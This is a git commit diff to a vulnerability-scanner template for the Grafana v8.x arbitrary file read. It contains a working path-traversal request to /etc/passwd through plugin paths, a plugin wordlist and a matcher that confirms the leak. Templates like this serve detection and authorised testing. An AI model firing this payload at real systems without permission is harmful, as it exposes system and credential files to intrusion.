Update grafana-file-read.yaml

2022-05-23 13:27:45 +05:30 · 2022-05-23 13:27:45 +05:30 · 428176e5f6
parent 7e0fc34783
commit 428176e5f6
1 changed files with 7 additions and 48 deletions
--- a/vulnerabilities/grafana/grafana-file-read.yaml
+++ b/vulnerabilities/grafana/grafana-file-read.yaml
@ -2,72 +2,31 @@ id: grafana-file-read

 info:
  name: Grafana v8.x Arbitrary File Read
-  author: z0ne,dhiyaneshDk, jeya.seelan
+  author: z0ne,dhiyaneshDk,jeya.seelan,dwisiswant0
  severity: high
  reference:
    - https://nosec.org/home/detail/4914.html
    - https://github.com/jas502n/Grafana-VulnTips
-    - https://twitter.com/pyn3rd/status/1468138032477859841
+    - hhttps://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
    - https://twitter.com/naglinagli/status/1468155313182416899
-  tags: grafana,lfi
-  remediation: The latest Grafana unpatched 0 Day LFI  is now being actively exploited, it affects only Grafana 8.0+, Vulnerable companies should revoke the secrets they store at their /etc/grafana/grafana.ini ASAP as there is no official fix in the meantime.
+  tags: grafana,lfi,fuzz

 requests:
  - method: GET
    path:
-      - "{{BaseURL}}/public/plugins/{{plugin-id}}/../../../../../../../../../../../../../../../../../../../etc/passwd"
+      - "{{BaseURL}}/public/plugins/{{pluginSlug}}/../../../../../../../../../../../../../../../../../../../etc/passwd"

    payloads:
-      plugin-id:
-        - grafana-clock-panel
-        - alertlist
-        - graph
-        - elasticsearch
-        - dashlist
-        - cloudwatch
-        - mysql
-        - influxdb
-        - heatmap
-        - graphite
-        - prometheus
-        - postgres
-        - pluginlist
-        - opentsdb
-        - text
-        - table
-        - stackdriver
-        - grafana-azure-monitor-datasource
-        - grafana-simple-json-datasource
-        - annolist
-        - barchart
-        - bargauge
-        - candlestick
-        - gauge
-        - geomap
-        - gettingstarted
-        - histogram
-        - jaeger
-        - logs
-        - loki
-        - mssql
-        - news
-        - nodeGraph
-        - piechart
-        - stat
-        - state-timeline
-        - status-history
-        - tempo
-        - timeseries
-        - welcome
-        - zipkin
+      pluginSlug: helpers/wordlists/grafana-plugins.txt

+    threads: 50
    stop-at-first-match: true
    matchers-condition: and
    matchers:

      - type: regex
        regex:
-          - "root:.*:0:0"
+          - "root:.*:0:0:"

      - type: status
        status: